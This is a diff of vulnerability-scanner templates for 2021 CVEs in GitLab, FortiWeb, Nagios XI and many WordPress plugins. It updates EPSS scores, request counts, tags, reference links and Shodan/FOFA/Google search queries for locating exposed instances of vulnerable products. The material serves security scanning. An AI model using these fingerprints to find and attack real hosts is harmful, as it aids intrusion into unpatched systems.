b/http/cves/2021/CVE-2021-22122.yaml @@ -28,6 +28,9 @@ info: max-request: 2 vendor: fortinet product: fortiweb + shodan-query: http.title:"fortiweb - " + fofa-query: title="fortiweb - " + google-query: intitle:"fortiweb - " tags: cve2021,cve,fortiweb,xss,fortinet http: diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 7acd120f1e..82d559627d 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -22,14 +22,17 @@ info: cvss-score: 10 cve-id: CVE-2021-22205 cwe-id: CWE-94 - epss-score: 0.97333 - epss-percentile: 0.99868 + epss-score: 0.97463 + epss-percentile: 0.99959 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2021,cve,kev,hackerone,gitlab,rce diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index c7acf1110c..7d701316f2 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -31,7 +31,10 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2021,cve,gitlab,ssrf diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml index cb68b9daba..58e3ddb280 100644 --- a/http/cves/2021/CVE-2021-22502.yaml +++ b/http/cves/2021/CVE-2021-22502.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22502 cwe-id: CWE-78 - epss-score: 0.95993 - epss-percentile: 0.99434 + epss-score: 0.96085 + epss-percentile: 0.99492 cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 20ad76d934..786823e519 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: schneider-electric product: evlink_city_evc1s22p4_firmware - shodan-query: title:"EVSE web interface" - fofa-query: title="EVSE web interface" + shodan-query: + - title:"EVSE web interface" + - http.title:"evse web interface" + fofa-query: + - title="EVSE web interface" + - title="evse web interface" google-query: intitle:"evse web interface" tags: cve2021,cve,evlink,auth-bypass,schneider-electric diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index fde9c3bb60..ecde7adfb4 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -28,8 +28,12 @@ info: max-request: 6 vendor: revive-adserver product: revive_adserver - shodan-query: http.favicon.hash:106844876 - fofa-query: icon_hash=106844876 + shodan-query: + - http.favicon.hash:106844876 + - http.title:"revive adserver" + fofa-query: + - icon_hash=106844876 + - title="revive adserver" google-query: intitle:"revive adserver" tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 15294b2567..08cd4cf267 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: rocket.chat product: rocket.chat - shodan-query: http.title:"Rocket.Chat" + shodan-query: + - http.title:"Rocket.Chat" + - http.title:"rocket.chat" fofa-query: title="rocket.chat" google-query: intitle:"rocket.chat" tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index 244295f61e..c012723a81 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -14,13 +14,14 @@ info: - https://wordpress.org/plugins/backup/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24155 - http://packetstormsecurity.com/files/163382/WordPress-Backup-Guard-1.5.8-Shell-Upload.html + - https://github.com/0dayNinja/CVE-2021-24155.rb classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24155 cwe-id: CWE-434 - epss-score: 0.95488 - epss-percentile: 0.99234 + epss-score: 0.96281 + epss-percentile: 0.99534 cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index f4dfbc1a06..a39285a954 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -29,9 +29,9 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress - publicwww-query: /wp-content/plugins/ninja-forms/ shodan-query: http.html:/wp-content/plugins/ninja-forms/ fofa-query: body=/wp-content/plugins/ninja-forms/ + publicwww-query: /wp-content/plugins/ninja-forms/ tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms http: diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index 3c4d2c3e07..d9df5c85cd 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2021-24176 cwe-id: CWE-79 - epss-score: 0.00136 - epss-percentile: 0.48949 + epss-score: 0.00186 + epss-percentile: 0.55717 cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 04a74913bc..7cb5374bc0 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -25,9 +25,9 @@ info: cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: daggerhartlab - product: openid_connect_generic_client + product: "openid_connect_generic_client" framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index 6d571939e6..8c8b87d6b4 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -27,9 +27,9 @@ info: vendor: wpruby product: controlled_admin_access framework: wordpress - publicwww-query: /wp-content/plugins/controlled-admin-access/ shodan-query: http.html:/wp-content/plugins/controlled-admin-access/ fofa-query: body=/wp-content/plugins/controlled-admin-access/ + publicwww-query: /wp-content/plugins/controlled-admin-access/ tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby http: diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index 0c2abeb26f..b533c5a11d 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24226 cwe-id: CWE-200 epss-score: 0.03058 - epss-percentile: 0.90773 + epss-percentile: 0.90986 cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 2cb93cb77a..330d2df197 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -23,9 +23,9 @@ info: cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: genetechsolutions - product: pie_register + product: "pie_register" framework: wordpress tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index d2c93c402b..74ea297e4d 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.60494 cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: trumani - product: stop_spammers + product: "stop_spammers" framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index c3274e5f2b..f8e7a46e4e 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -21,16 +21,16 @@ info: cve-id: CVE-2021-24275 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60494 + epss-percentile: 0.61154 cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: supsystic product: popup framework: wordpress - publicwww-query: /wp-content/plugins/popup-by-supsystic shodan-query: http.html:/wp-content/plugins/popup-by-supsystic fofa-query: body=/wp-content/plugins/popup-by-supsystic + publicwww-query: /wp-content/plugins/popup-by-supsystic tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic http: diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 0bd7919fd2..aaef829355 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -28,9 +28,9 @@ info: vendor: supsystic product: contact_form framework: wordpress - publicwww-query: /wp-content/plugins/contact-form-plugin/ shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ fofa-query: body=/wp-content/plugins/contact-form-plugin/ + publicwww-query: /wp-content/plugins/contact-form-plugin/ tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic http: diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index f89c216090..afe318f210 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24284 cwe-id: CWE-434 - epss-score: 0.96657 - epss-percentile: 0.99614 + epss-score: 0.96712 + epss-percentile: 0.99652 cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -31,7 +31,6 @@ info: product: kaswara framework: wordpress tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project - variables: zip_file: "{{to_lower(rand_text_alpha(6))}}" php_file: "{{to_lower(rand_text_alpha(2))}}.php" diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 9cfe43d4db..02ebb005ba 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -27,9 +27,9 @@ info: vendor: 10web product: photo_gallery framework: wordpress - publicwww-query: /wp-content/plugins/photo-gallery shodan-query: http.html:/wp-content/plugins/photo-gallery fofa-query: body=/wp-content/plugins/photo-gallery + publicwww-query: /wp-content/plugins/photo-gallery tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web http: diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 6b404a1450..f1d11e905d 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -25,12 +25,11 @@ info: epss-percentile: 0.45761 cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: ibenic - product: simple_giveaways + product: "simple_giveaways" framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 6b4aa6e017..12b553a08d 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -24,8 +24,8 @@ info: epss-percentile: 0.46682 cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: bold-themes + max-request: 3 + vendor: "bold-themes" product: bello framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index 7fb2a3b0f2..7e0481e720 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.54412 cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: smartdatasoft - product: car_repair_services_\&_auto_mechanic + product: "car_repair_services_\\&_auto_mechanic" framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 465c664191..46d9da3c92 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -26,10 +26,10 @@ info: vendor: veronalabs product: wp_statistics framework: wordpress - google-query: inurl:/wp-content/plugins/wp-statistics - publicwww-query: /wp-content/plugins/wp-statistics/ shodan-query: http.html:/wp-content/plugins/wp-statistics/ fofa-query: body=/wp-content/plugins/wp-statistics/ + publicwww-query: /wp-content/plugins/wp-statistics/ + google-query: inurl:/wp-content/plugins/wp-statistics tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs http: diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 1bef78b439..94806a58d2 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -23,12 +23,11 @@ info: epss-percentile: 0.43845 cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: jnews product: jnews framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index be784166b6..2f0647816b 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.43845 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: tielabs product: jannah framework: wordpress tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index 08e7ae5460..f3e050b2da 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24387 cwe-id: CWE-79 epss-score: 0.00154 - epss-percentile: 0.50743 + epss-percentile: 0.51646 cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index ebcb45d7dd..7835c492da 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -23,12 +23,11 @@ info: epss-percentile: 0.58055 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: tielabs product: jannah framework: wordpress tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index 01c948f9f1..30b6e323b1 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -26,9 +26,9 @@ info: vendor: plugin-planet product: prismatic framework: wordpress - publicwww-query: "/wp-content/plugins/prismatic" shodan-query: http.html:/wp-content/plugins/prismatic fofa-query: body=/wp-content/plugins/prismatic + publicwww-query: "/wp-content/plugins/prismatic" tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet http: diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index ef5943bbeb..5bb7e4cdda 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -25,10 +25,10 @@ info: vendor: wpdevart product: poll\,_survey\,_questionnaire_and_voting_system framework: wordpress - publicwww-query: "/wp-content/plugins/polls-widget/" shodan-query: http.html:/wp-content/plugins/polls-widget/ fofa-query: body=/wp-content/plugins/polls-widget/ - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli + publicwww-query: "/wp-content/plugins/polls-widget/" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart http: - raw: diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 1f57b5be55..07062bfc71 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24472 cwe-id: CWE-918 - epss-score: 0.04362 - epss-percentile: 0.92159 + epss-score: 0.03231 + epss-percentile: 0.91221 cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,9 +29,9 @@ info: vendor: qantumthemes product: kentharadio framework: wordpress - publicwww-query: "/wp-content/plugins/qt-kentharadio" shodan-query: http.html:/wp-content/plugins/qt-kentharadio fofa-query: body=/wp-content/plugins/qt-kentharadio + publicwww-query: "/wp-content/plugins/qt-kentharadio" tags: cve2021,cve,wordpress,lfi,ssrf,wp,wp-plugin,wpscan,qantumthemes http: diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index ccd8d8b750..2d534bc76e 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -25,9 +25,9 @@ info: vendor: g_auto-hyperlink_project product: g_auto-hyperlink framework: wordpress - publicwww-query: /wp-content/plugins/g-auto-hyperlink/ shodan-query: http.html:/wp-content/plugins/g-auto-hyperlink/ fofa-query: body=/wp-content/plugins/g-auto-hyperlink/ + publicwww-query: /wp-content/plugins/g-auto-hyperlink/ tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project variables: num: 999999999 diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index b5fcefc9e4..c1c1d4401a 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/asgaros-forum/ - https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum - https://nvd.nist.gov/vuln/detail/CVE-2021-24827 + - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24827 cwe-id: CWE-89 - epss-score: 0.11843 - epss-percentile: 0.94798 + epss-score: 0.20659 + epss-percentile: 0.96374 cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index 0909a4c438..f6f47c2c33 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -25,10 +25,10 @@ info: vendor: wclovers product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible framework: wordpress - publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli + publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 5fa848cbeb..41fed7d518 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.45236 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 + max-request: 3 vendor: elementor - product: website_builder + product: "website_builder" framework: wordpress tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index eca520dafd..21af45d464 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -25,9 +25,9 @@ info: vendor: contest_gallery product: contest_gallery framework: wordpress - publicwww-query: "/wp-content/plugins/contest-gallery/" shodan-query: http.html:/wp-content/plugins/contest-gallery/ fofa-query: body=/wp-content/plugins/contest-gallery/ + publicwww-query: "/wp-content/plugins/contest-gallery/" tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli http: diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index 064d8e7665..a2a24f1ae2 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -25,10 +25,10 @@ info: vendor: roundupwp product: registrations_for_the_events_calendar framework: wordpress - publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/ fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/ - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar + publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp variables: text: "{{rand_base(5)}}" diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index d2de46388d..862ef67636 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -25,9 +25,9 @@ info: vendor: strangerstudios product: paid_memberships_pro framework: wordpress - publicwww-query: /wp-content/plugins/paid-memberships-pro/ shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ fofa-query: body=/wp-content/plugins/paid-memberships-pro/ + publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index 5a9b19a264..18d189136f 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24997 cwe-id: CWE-862 epss-score: 0.0019 - epss-percentile: 0.55517 + epss-percentile: 0.56317 cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index 075bcfb9cd..2a760c7a44 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25016 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,9 +25,9 @@ info: vendor: premio product: chaty framework: wordpress - publicwww-query: "/wp-content/plugins/chaty/" shodan-query: http.html:/wp-content/plugins/chaty/ fofa-query: body=/wp-content/plugins/chaty/ + publicwww-query: "/wp-content/plugins/chaty/" tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio http: diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 6e37a3df8e..eb1f17b011 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25055 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 6147e1b998..eab573e463 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -26,9 +26,9 @@ info: vendor: smashballoon product: smash_balloon_social_post_feed framework: wordpress - publicwww-query: "/wp-content/plugins/custom-facebook-feed/" shodan-query: http.html:/wp-content/plugins/custom-facebook-feed/ fofa-query: body=/wp-content/plugins/custom-facebook-feed/ + publicwww-query: "/wp-content/plugins/custom-facebook-feed/" tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon http: diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index 726e7dd13e..aaa35575d3 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25074 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index 82dd73ca3c..bc9d924dcc 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -30,10 +30,10 @@ info: vendor: strangerstudios product: paid_memberships_pro framework: wordpress - google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - publicwww-query: /wp-content/plugins/paid-memberships-pro/ shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ fofa-query: body=/wp-content/plugins/paid-memberships-pro/ + publicwww-query: /wp-content/plugins/paid-memberships-pro/ + google-query: inurl:"/wp-content/plugins/paid-memberships-pro" tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios http: diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 8a0c984469..d9836f7442 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -29,8 +29,12 @@ info: max-request: 4 vendor: nagios product: nagios_xi - shodan-query: title:"Nagios XI" - fofa-query: title="nagios xi" + shodan-query: + - title:"Nagios XI" + - http.title:"nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 1171afbe2b..9436ad3701 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -29,8 +29,12 @@ info: max-request: 4 vendor: nagios product: nagios_xi - shodan-query: title:"Nagios XI" - fofa-query: title="nagios xi" + shodan-query: + - title:"Nagios XI" + - http.title:"nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 301f11c503..6ef6c2d41f 100644 --- a/http/cves/2021/CVE-2021-25298.yaml 